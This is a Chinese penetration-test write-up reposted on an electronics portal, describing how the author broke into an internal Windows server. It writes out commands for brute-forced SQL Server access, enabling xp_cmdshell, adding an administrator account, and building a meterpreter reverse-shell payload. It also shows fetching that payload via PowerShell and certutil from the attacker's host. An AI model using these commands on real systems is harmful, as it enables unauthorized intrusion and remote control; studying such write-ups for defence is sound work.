0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

記一次內(nèi)網(wǎng)中反彈shell的艱難歷程

jf_Fo0qk3ln ? 來源:先知社區(qū) ? 2023-03-07 09:30 ? 次閱讀

0x00 前言

最近在客戶現(xiàn)場對內(nèi)網(wǎng)服務(wù)器進行滲透測試,發(fā)現(xiàn)了大量的弱口令,本次歷程就是從這里開始···

0x01 弱口令

對目標(biāo)ip進行端口掃描,開放端口為80,445,1433,3389

訪問80端口,只是一個安裝成功的界面,掃描一下目錄看是否有源碼泄露,無果

使用nmap腳本對445端口進行掃描,看是否存在ms17010等漏洞,無果

使用超級弱口令工具爆破1433,爆破成功,賬號密碼:sa/sa

同時對3389端口進行爆破,無果

因此確定了突破口,使用navicat成功連接sql server數(shù)據(jù)庫

0x02 連接3389

翻了一下,沒什么數(shù)據(jù),嘗試拿服務(wù)器吧,因此直接新建查詢,開啟xp_cmdshell:


EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE; 然后執(zhí)行命令

exec master..xp_cmdshell "whoami"; 是system權(quán)限,和想象中的一樣 3389是開著的,不如加個用戶直接連接遠(yuǎn)程桌面吧

48f3e3ce-bc74-11ed-bfe3-dac502259ad0.png

加強密碼強度,重新添加


exec master..xp_cmdshell "net user test paperpen123. /add"; exec master..xp_cmdshell "net localgroup administrators test /add"; 一切都很順利,開始連接3389,但遺憾的是

4906afea-bc74-11ed-bfe3-dac502259ad0.png

是win7,只允許單用戶登錄,如果擠他的話被發(fā)現(xiàn)就不能繼續(xù)玩耍了,還是放棄連接3389吧

0x03 powershell下載木馬

我還是把shell彈到本地來吧,方便操作,但是說著簡單,該怎么彈呢? 需要強調(diào)一點,這里的內(nèi)網(wǎng)不可以訪問外網(wǎng),因此無法使用命令從外網(wǎng)下載工具 那么可以這樣,讓他從我的本地服務(wù)器下載工具到他的服務(wù)器上就可以了 但是要關(guān)閉本機防火墻,執(zhí)行后訪問失敗才想起來。我的ip是195.1.7.23 使用kali生成exe木馬


msfvenom -p windows/meterpreter/reverse_tcp LHOST=195.1.7.23 LPORT=8888 -f exe > shell.exe 本地phpstudy快速搭建環(huán)境 將shell.exe放到網(wǎng)站根目錄下,鏈接為http://195.1.7.23/shell.exe 本地監(jiān)聽8888端口

msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST 195.1.7.23 LHOST => 195.1.7.23 msf5 exploit(multi/handler) > set LPORT 8888 LPORT => 8888 msf5 exploit(multi/handler) > exploit 一切準(zhǔn)備就緒,就差服務(wù)器執(zhí)行shell.exe文件了。接下來的命令,大多是我朋友Calendula提供的,感謝一下 經(jīng)測試,powershell是可以執(zhí)行命令的,因此執(zhí)行朋友Calendula給的下載命令

exec master..xp_cmdshell "powershell $client = new-object System.Net.WebClient"; exec master..xp_cmdshell "powershell $client.DownloadFile('http://195.1.7.23/shell.exe', 'shell.exe')"; 這兩句本可以合并到一起執(zhí)行,但是前面嘗試執(zhí)行其他命令時發(fā)現(xiàn)有長度限制

4913e638-bc74-11ed-bfe3-dac502259ad0.png

所以拆分進行執(zhí)行,但是遺憾的是

493592ce-bc74-11ed-bfe3-dac502259ad0.png

DownloadFile無法使用,具體因為什么也沒搞清楚,因此放棄了這種方法

0x04 證書下載

朋友Calendula又給我提供了一種思路,使用certutil.exe,頓時驚呆、聞所未聞,命令如下:


exec master..xp_cmdshell 'certutil.exe -urlcache -split -f "http://195.1.7.23/shell.exe"'; 使用dir查看,發(fā)現(xiàn)成功下載到了服務(wù)器上

494c47a8-bc74-11ed-bfe3-dac502259ad0.png

0x05 反彈成功

就差一步了,輸入下面的命令并緊張地點擊了執(zhí)行


exec master..xp_cmdshell 'shell.exe'; 卡住了···,又執(zhí)行了一遍,又卡住了···,又執(zhí)行了一遍,什么情況··· 回到監(jiān)聽界面,打算按下ctrl+c重新監(jiān)聽,結(jié)果進了meterpreter界面,原來是它卡住了···

496332e2-bc74-11ed-bfe3-dac502259ad0.png

激動地截了張圖

4975ed4c-bc74-11ed-bfe3-dac502259ad0.png

查看了一下是不是域環(huán)境

498efc2e-bc74-11ed-bfe3-dac502259ad0.png

沒錯是的,看來還有很長的路要走。。

0x06 結(jié)語

這次就寫到這吧,如有進展,還會更新。歡迎各位師傅們留言討論,互相交流,互相學(xué)習(xí),共同進步。

審核編輯:湯梓紅

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • 服務(wù)器
    +關(guān)注

    關(guān)注

    12

    文章

    8849

    瀏覽量

    84953
  • 數(shù)據(jù)庫
    +關(guān)注

    關(guān)注

    7

    文章

    3737

    瀏覽量

    64173
  • 端口
    +關(guān)注

    關(guān)注

    4

    文章

    935

    瀏覽量

    31946
  • Shell
    +關(guān)注

    關(guān)注

    1

    文章

    361

    瀏覽量

    23234
  • 腳本
    +關(guān)注

    關(guān)注

    1

    文章

    384

    瀏覽量

    14793

原文標(biāo)題:實戰(zhàn) | 記一次內(nèi)網(wǎng)中反彈shell的艱難歷程

文章出處:【微信號:菜鳥學(xué)信安,微信公眾號:菜鳥學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦

    【freeRTOS開發(fā)筆記】一次坑爹的freeTOS升級

    【freeRTOS開發(fā)筆記】一次坑爹的freeTOS-v9.0.0升級到freeRTOS-v10.4.4
    的頭像 發(fā)表于 07-11 09:15 ?4422次閱讀
    【freeRTOS開發(fā)筆記】<b class='flag-5'>記</b><b class='flag-5'>一次</b>坑爹的freeTOS升級

    基于Go語言的反彈Shell命令生成工具簡介

    RevShell 是個基于Go語言的反彈Shell命令生成工具,旨在幫助安全研究人員和滲透測試人員在需要與目標(biāo)主機建立反向連接時快速生成相應(yīng)的Shell代碼。
    發(fā)表于 08-25 09:45 ?699次閱讀
    基于Go語言的<b class='flag-5'>反彈</b><b class='flag-5'>Shell</b>命令生成工具簡介

    STM32F429如何一次傳3000個數(shù)據(jù)?

    正點原子的歷程實用的是8位的數(shù)據(jù)傳輸,也就是說最多一次能傳255個數(shù)據(jù),我要是一次想傳3000個數(shù)據(jù),應(yīng)該怎么更給程序?
    發(fā)表于 05-11 08:56

    使用HAProxy軟件的一次學(xué)習(xí)過程介紹

    一次學(xué)習(xí)過程
    發(fā)表于 06-13 10:48

    一次網(wǎng)站設(shè)計稿的方法

    一次網(wǎng)站設(shè)計稿
    發(fā)表于 06-16 09:43

    一次呼叫典型流程

    一次呼叫典型流程:一次呼叫典型流程B.1 概述本章將分別給出主叫流程和被叫流程的例子,以示一次通話過程UTRAN的典型流程。B.2 主叫流程主叫流程是指UE呼叫其它用戶
    發(fā)表于 11-28 17:57 ?26次下載

    一次電池為什么不能被充電?

    一次電池為什么不能被充電? 一次電池不能被充電再生是構(gòu)成一次電池體系的本性所決定的,因為一次電池的電極反應(yīng)不可逆,也就是說,放電后的放電產(chǎn)
    發(fā)表于 10-28 15:29 ?5748次閱讀

    循環(huán)充放電一次就是少一次壽命嗎?

    循環(huán)充放電一次就是少一次壽命嗎?     循環(huán)就是使用,我們是在使用電池,關(guān)心的是使
    發(fā)表于 11-11 13:59 ?835次閱讀

    電池循環(huán)充放電一次就是少一次壽命嗎?

    電池循環(huán)充放電一次就是少一次壽命嗎? 循環(huán)就是使用,我們是在使用電池,關(guān)心的是使用的時間,為了衡量充電電池
    發(fā)表于 09-06 11:05 ?3588次閱讀

    PT柜為什么要安裝一次消諧器

    PT柜可以安裝一次消諧器,那么PT柜中定要安裝一次消諧裝置嗎?
    發(fā)表于 07-22 15:44 ?3200次閱讀

    一次CH552不識別無法下載解決辦法

    一次CH552不識別解決辦法插入鏈接與圖片如何插入段漂亮的代碼片生成個適合你的列表創(chuàng)建個表格設(shè)定內(nèi)容居中、居左、居右SmartyPa
    發(fā)表于 01-12 19:15 ?5次下載
    <b class='flag-5'>記</b><b class='flag-5'>一次</b>CH552不識別無法下載解決辦法

    電氣一次識圖基礎(chǔ)

    電氣一次識圖基礎(chǔ)
    的頭像 發(fā)表于 11-12 11:24 ?2070次閱讀

    一次消諧如何接線

    一次消諧如何接線 一次消諧器是種用于消除電力系統(tǒng)諧波的裝置,通常需要與電容器和電抗器組合使用。在安裝一次消諧器時,需要注意以下接線步驟:
    的頭像 發(fā)表于 03-22 16:50 ?1932次閱讀

    一次調(diào)頻和二調(diào)頻的概念 一次調(diào)頻可以實現(xiàn)無差調(diào)節(jié)?

    一次調(diào)頻和二調(diào)頻的概念 一次調(diào)頻可以實現(xiàn)無差調(diào)節(jié)? 、一次調(diào)頻和二調(diào)頻的概念 1.
    的頭像 發(fā)表于 10-17 16:15 ?8511次閱讀

    基波是一次諧波么 基波與一次諧波的區(qū)別

    基波是一次諧波么 基波與一次諧波的區(qū)別? 基波和一次諧波是兩個不同的概念。 基波是在諧波分析中指的是頻率最低且沒有任何諧波成分的波形,它是構(gòu)成復(fù)雜波形的基礎(chǔ)。在正弦波,基波就是正弦波
    的頭像 發(fā)表于 04-08 17:11 ?5228次閱讀